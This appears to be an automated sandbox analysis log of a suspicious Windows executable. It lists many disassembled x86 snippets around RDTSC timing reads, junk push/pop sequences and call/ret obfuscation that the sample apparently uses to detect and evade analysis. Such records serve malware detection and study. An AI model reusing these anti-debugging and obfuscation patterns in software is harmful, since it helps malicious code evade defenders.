Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114ECAC second address: 114ED63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC7292A9B10h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d jmp 00007FC7292A9B12h 0x00000012 pop edi 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FC7292A9B08h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e add ebx, dword ptr [ebp+122D17E9h] 0x00000034 push dword ptr fs:[00000000h] 0x0000003b mov ebx, dword ptr [ebp+122D2BB7h] 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 push 00000000h 0x0000004a push eax 0x0000004b call 00007FC7292A9B08h 0x00000050 pop eax 0x00000051 mov dword ptr [esp+04h], eax 0x00000055 add dword ptr [esp+04h], 0000001Bh 0x0000005d inc eax 0x0000005e push eax 0x0000005f ret 0x00000060 pop eax 0x00000061 ret 0x00000062 mov eax, dword ptr [ebp+122D00F9h] 0x00000068 jo 00007FC7292A9B06h 0x0000006e push FFFFFFFFh 0x00000070 sub ebx, dword ptr [ebp+122D2E6Fh] 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 push ebx 0x0000007a jmp 00007FC7292A9B10h 0x0000007f pop ebx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114ED63 second address: 114ED7A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC728ECBE0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1155D22 second address: 1155D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a movsx edi, dx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FC7292A9B08h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 xor bl, 00000000h 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e jo 00007FC7292A9B08h 0x00000034 push esi 0x00000035 pop esi 0x00000036 pushad 0x00000037 jmp 00007FC7292A9B15h 0x0000003c push eax 0x0000003d pop eax 0x0000003e popad 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FC7292A9B0Ah 0x00000048 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114ED7A second address: 114ED88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1155D84 second address: 1155D8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1153DDD second address: 1153DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 115E115 second address: 115E148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Fh 0x00000007 push edi 0x00000008 jmp 00007FC7292A9B0Eh 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 ja 00007FC7292A9B1Ah 0x00000018 jc 00007FC7292A9B0Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11661C0 second address: 11661DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11661DA second address: 11661DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F4056 second address: 10F405C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F405C second address: 10F4066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC7292A9B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F4066 second address: 10F4070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F4070 second address: 10F4076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116A58C second address: 116A5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FC728ECBE11h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116A5A5 second address: 116A5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FC7292A9B0Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116A5B8 second address: 116A5D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE13h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116A5D1 second address: 116A5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116A5D5 second address: 116A5DF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC728ECBE06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116AFAC second address: 116AFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1170B64 second address: 1170B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FC728ECBE06h 0x0000000d jmp 00007FC728ECBE0Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1170B7C second address: 1170B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F5AF second address: 116F5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC728ECBE08h 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F5C1 second address: 116F5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F6EA second address: 116F6F4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC728ECBE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F6F4 second address: 116F73A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7292A9B16h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 jng 00007FC7292A9B20h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F87E second address: 116F882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F882 second address: 116F891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116F891 second address: 116F8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FC728ECBE06h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116FB2E second address: 116FB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007FC7292A9B11h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116FB48 second address: 116FB5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC728ECBE0Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 116FB5B second address: 116FB93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Dh 0x00000007 jnc 00007FC7292A9B06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FC7292A9B13h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10E9FAB second address: 10E9FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10E9FB1 second address: 10E9FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC7292A9B06h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007FC7292A9B12h 0x00000012 jp 00007FC7292A9B16h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10E9FE9 second address: 10E9FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11709A8 second address: 11709BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B10h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11709BE second address: 11709EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007FC728ECBE06h 0x00000014 jmp 00007FC728ECBE0Ch 0x00000019 popad 0x0000001a push esi 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop esi 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11709EB second address: 11709F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11709F0 second address: 1170A0C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC728ECBE16h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10F902A second address: 10F902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114252B second address: 114254B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114254B second address: 1142555 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC7292A9B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142555 second address: 11425BD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007FC728ECBE06h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FC728ECBE08h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007FC728ECBE0Dh 0x0000002c call 00007FC728ECBE0Dh 0x00000031 stc 0x00000032 pop edx 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jo 00007FC728ECBE06h 0x0000003d jmp 00007FC728ECBE10h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11425BD second address: 11425E5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7292A9B15h 0x00000008 jmp 00007FC7292A9B0Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FC7292A9B0Ch 0x00000018 jnp 00007FC7292A9B06h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11426DC second address: 1142700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d je 00007FC728ECBE18h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142700 second address: 1142721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push ebx 0x0000000d jmp 00007FC7292A9B0Bh 0x00000012 pop ebx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142943 second address: 1142948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142948 second address: 114295D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7292A9B11h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114295D second address: 1142961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142961 second address: 1142982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000004h 0x0000000d mov dh, 21h 0x0000000f push eax 0x00000010 pushad 0x00000011 jnc 00007FC7292A9B0Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142982 second address: 1142986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142D2E second address: 1142D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11430CE second address: 1143166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FC728ECBE08h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+12493C5Fh] 0x0000002a mov edx, dword ptr [ebp+122D2435h] 0x00000030 nop 0x00000031 jg 00007FC728ECBE10h 0x00000037 push eax 0x00000038 jc 00007FC728ECBE0Ah 0x0000003e push edi 0x0000003f pushad 0x00000040 popad 0x00000041 pop edi 0x00000042 nop 0x00000043 jne 00007FC728ECBE13h 0x00000049 lea eax, dword ptr [ebp+12493C1Bh] 0x0000004f push 00000000h 0x00000051 push edi 0x00000052 call 00007FC728ECBE08h 0x00000057 pop edi 0x00000058 mov dword ptr [esp+04h], edi 0x0000005c add dword ptr [esp+04h], 00000018h 0x00000064 inc edi 0x00000065 push edi 0x00000066 ret 0x00000067 pop edi 0x00000068 ret 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jbe 00007FC728ECBE06h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1143166 second address: 114316A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 114316A second address: 1143170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1143170 second address: 114318F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7292A9B0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FC7292A9B0Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1178BEF second address: 1178BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10ED644 second address: 10ED64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7292A9B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10ED64E second address: 10ED671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FC728ECBE1Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10ED671 second address: 10ED67C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC7292A9B06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11813B0 second address: 11813C0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC728ECBE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11813C0 second address: 11813C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11816A0 second address: 11816B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC728ECBE10h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11816B4 second address: 11816B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1184988 second address: 1184992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC728ECBE06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1184992 second address: 118499C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7292A9B06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10FC31E second address: 10FC343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC728ECBE06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 10FC343 second address: 10FC359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B12h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1184495 second address: 11844B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC728ECBE16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11844B1 second address: 11844BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007FC7292A9B06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11844BF second address: 11844D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC728ECBE0Eh 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11844D7 second address: 11844DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11844DD second address: 11844EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FC728ECBE0Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 118466B second address: 1184688 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B18h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 118786A second address: 118786E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 118786E second address: 1187884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B10h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1187884 second address: 118789A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 118789A second address: 11878C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jl 00007FC7292A9B12h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11870EC second address: 11870F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007FC728ECBE06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11870F9 second address: 118714F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FC7292A9B18h 0x00000010 jmp 00007FC7292A9B0Fh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC7292A9B19h 0x0000001f jl 00007FC7292A9B06h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 118714F second address: 1187171 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC728ECBE16h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
